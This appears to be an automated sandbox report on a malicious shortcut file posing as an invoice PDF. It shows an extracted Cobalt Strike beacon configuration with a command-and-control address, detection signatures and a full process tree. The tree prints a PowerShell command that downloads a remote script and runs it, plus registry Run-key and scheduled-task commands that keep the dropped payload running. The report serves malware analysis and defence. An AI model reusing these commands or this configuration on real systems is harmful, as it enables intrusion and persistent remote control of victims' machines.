Analysis
-
max time kernel
123s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
06-02-2023 16:45
Static task
static1
Behavioral task
behavioral1
Sample
Overdue_Invoice_2023.pdf.lnk
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
Overdue_Invoice_2023.pdf.lnk
Resource
win10v2004-20220812-en
General
-
Target
Overdue_Invoice_2023.pdf.lnk
-
Size
1KB
-
MD5
65247221e9addff22b50070ba1893bb6
-
SHA1
e373bac187d3faeba2d13cb5cf284b79c10f7d0c
-
SHA256
9e9262ab44b3df0478357a790aa39abae9217e74349758e39db4bd7064597875
-
SHA512
a1a864489b98ddee67c21ee9014a6d3e44b1fd8790af9421b9d9515df7e06d6dbafc85b464424a51a48742d035ba25e423f8edb295107df5badc90c17e1babab
Malware Config
Extracted
cobaltstrike
987654321
http://45.12.253.139:443/an.js
-
access_type
512
-
beacon_type
2048
-
host
45.12.253.139,/an.js
-
http_header1
AAAAEAAAABpIb3N0OiBidXNpbmVzc3NlcnZpY2VzLmNvbQAAAAoAAAARQ29ubmVjdGlvbjogY2xvc2UAAAAKAAAAE0FjY2VwdC1FbmNvZGluZzogYnIAAAAKAAAAFkFjY2VwdC1MYW5ndWFnZTogZW4tVVMAAAAHAAAAAAAAAA0AAAADAAAAAgAAABp3b29jb21tZXJjZV9pdGVtc19pbl9jYXJ0PQAAAAYAAAAGQ29va2llAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_header2
AAAAEAAAABpIb3N0OiBidXNpbmVzc3NlcnZpY2VzLmNvbQAAAAoAAAARQ29ubmVjdGlvbjogY2xvc2UAAAAKAAAAGUFjY2VwdC1FbmNvZGluZzogZ3ppcCwgYnIAAAAKAAAAL0NvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkAAAABwAAAAEAAAANAAAAAwAAAAIAAAAIZGV0YWlscz0AAAAEAAAABwAAAAAAAAADAAAAAgAAAA5fX3Nlc3Npb25fX2lkPQAAAAYAAAAGQ29va2llAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_method1
GET
-
http_method2
POST
-
jitter
9472
-
polling_time
55991
-
port_number
443
-
sc_process32
%windir%\syswow64\dllhost.exe
-
sc_process64
%windir%\sysnative\dllhost.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMEuNG3asVOp+bgSmSog10bB55R9e+aj5dF2sVbnRjA/dTkltRdDD0DdF5vJh/gURBikZ4FxqqmfqR2SPAheOzDDrYvV7ScpwPkZe8IUd/DbJmPs30ST9SGHn+eLjTQQEU+I142t7yTsO7HCKf1CTDMHfS3PNoz3V8ivNRwL1aiQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
9.63976192e+08
-
unknown2
AAAABAAAAAIAAANxAAAAAwAAAA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
uri
/ch
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/42.0.2311.135
-
watermark
987654321
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
RuntimeBroker.exedescription pid process target process PID 3392 created 2556 3392 RuntimeBroker.exe Explorer.EXE PID 3392 created 2556 3392 RuntimeBroker.exe Explorer.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 16 1152 powershell.exe 19 4652 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
RuntimeBroker.exepid process 3392 RuntimeBroker.exe -
Loads dropped DLL 1 IoCs
Processes:
RuntimeBroker.exepid process 3392 RuntimeBroker.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftLibrary = "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\\Libraries\\MicrosoftLibrary; Start-Process $env:Public\\Libraries\\MicrosoftLibrary\\RuntimeBroker.exe\"" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exeRuntimeBroker.exeAcroRd32.exepid process 1152 powershell.exe 1152 powershell.exe 4652 powershell.exe 4652 powershell.exe 3392 RuntimeBroker.exe 3392 RuntimeBroker.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
Processes:
RuntimeBroker.exepid process 3392 RuntimeBroker.exe 3392 RuntimeBroker.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1152 powershell.exe Token: SeDebugPrivilege 4652 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AcroRd32.exepid process 2764 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
AcroRd32.exepid process 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe 2764 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exepowershell.exeAcroRd32.exeRdrCEF.exedescription pid process target process PID 956 wrote to memory of 1152 956 cmd.exe powershell.exe PID 956 wrote to memory of 1152 956 cmd.exe powershell.exe PID 956 wrote to memory of 1152 956 cmd.exe powershell.exe PID 1152 wrote to memory of 4652 1152 powershell.exe powershell.exe PID 1152 wrote to memory of 4652 1152 powershell.exe powershell.exe PID 1152 wrote to memory of 4652 1152 powershell.exe powershell.exe PID 4652 wrote to memory of 2764 4652 powershell.exe AcroRd32.exe PID 4652 wrote to memory of 2764 4652 powershell.exe AcroRd32.exe PID 4652 wrote to memory of 2764 4652 powershell.exe AcroRd32.exe PID 4652 wrote to memory of 2316 4652 powershell.exe attrib.exe PID 4652 wrote to memory of 2316 4652 powershell.exe attrib.exe PID 4652 wrote to memory of 2316 4652 powershell.exe attrib.exe PID 2764 wrote to memory of 1440 2764 AcroRd32.exe RdrCEF.exe PID 2764 wrote to memory of 1440 2764 AcroRd32.exe RdrCEF.exe PID 2764 wrote to memory of 1440 2764 AcroRd32.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 3084 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 4516 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 4516 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 4516 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 4516 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 4516 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 4516 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 4516 1440 RdrCEF.exe RdrCEF.exe PID 1440 wrote to memory of 4516 1440 RdrCEF.exe RdrCEF.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Overdue_Invoice_2023.pdf.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 Invoke-WebRequest 'http://billingservice.hopto.org/UY7G6S/f4Ag4.txt' -UseBasicParsing | Select-Object -Expand Content | powershell2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"3⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Invoice.pdf"4⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140435⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FA3F0DA423D58F000F00BB4C8644823C --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E1A1D12CB97133028473753CE707BFB7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E1A1D12CB97133028473753CE707BFB7 --renderer-client-id=2 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job /prefetch:16⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3267DEC68BC5B289D34F6968C47867D3 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3267DEC68BC5B289D34F6968C47867D3 --renderer-client-id=4 --mojo-platform-channel-handle=2152 --allow-no-sandbox-job /prefetch:16⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=322335C1F8CBAA6E215F2FBE75B5A4EF --mojo-platform-channel-handle=2540 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=07F591F1868D2CD43F73208616567444 --mojo-platform-channel-handle=2864 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=43A37E805A03BCF90F1ACE7814341232 --mojo-platform-channel-handle=2796 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Windows\SysWOW64\attrib.exe"C:\Windows\system32\attrib.exe" +h C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc4⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\RuntimeBroker.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Windows\System32\cmd.exe/C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f5⤵
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f6⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Windows\System32\schtasks.exe/F /Create /TN Microsoft_Library /sc minute /MO 80 /TR "powershell.exe -WindowStyle hidden -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe5⤵
- Creates scheduled task(s)
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\windows\system32\wermgr.exe"C:\windows\system32\wermgr.exe"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5f26d40f3fe3b07202462281e3520a8a5
SHA138c528ce4457b2bb1fd9aa18597275e4ca6492ef
SHA256a556110b4c51077cba0f523c08060bb41b3380751311f47f3da03de9cf20bf84
SHA5122a9af331837bc09e21f06aab4b6ad2a532defd5e0719fe42ea73e5cd44e6262eb2f8df46c07b843d46d457737eceec716829f3a3f7a5fa94282f420ddaed5de4
-
C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\RuntimeBroker.exeFilesize
100KB
MD5ba4cfe6461afa1004c52f19c8f2169dc
SHA1ab8539ef6b2a93ff9589dec4b34a0257b6296c92
SHA256e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628
SHA5122c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0
-
C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\RuntimeBroker.exeFilesize
100KB
MD5ba4cfe6461afa1004c52f19c8f2169dc
SHA1ab8539ef6b2a93ff9589dec4b34a0257b6296c92
SHA256e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628
SHA5122c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0
-
C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\UMPDC.dllFilesize
391KB
MD51570c92c1c5f039c438295ac68ff7e82
SHA13ee6c1d3582361e8af4efec44b1d1420494ab728
SHA256b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4
SHA512fbf28062d81538f814e1a615caf9993aa24e54fd0b7ff84ead7e22002bac0a4c866d334fd445d6c7844289a7310e82a0febd07d7f02536ea51d11f9f884e4992
-
